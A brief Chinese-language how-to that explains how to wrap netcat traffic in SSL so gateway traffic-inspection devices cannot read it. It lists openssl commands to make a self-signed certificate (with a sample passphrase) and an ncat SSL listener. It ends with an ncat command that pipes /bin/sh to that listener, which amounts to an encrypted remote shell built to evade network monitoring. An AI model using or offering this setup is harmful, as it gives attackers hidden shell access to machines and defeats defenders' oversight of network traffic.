1,需求
如今的流量审查设备越来越多,
直接使用nc的话各种明文数据在网关上来来去去肯定没法接受,
最简单安全的方法就是用证书加密。
2,配置
1)客户端
a)生成csr
openssl req -new > new.ssl.csr
pem pass:Pass123!@#
challenga pass:
b)生成cert和key
openssl rsa -in privkey.pem -out newcert.key
openssl x509 -in new.ssl.csr -out newcert.cert -req -signkey newcert.key -days 3650
c)使用nc监听
ncat --ssl -l -k -v -4 -p 8443 --ssl-key /root/newcert.key --ssl-cert newcert.cert
2)服务端
ncat --ssl 127.0.0.1 8443 -e /bin/sh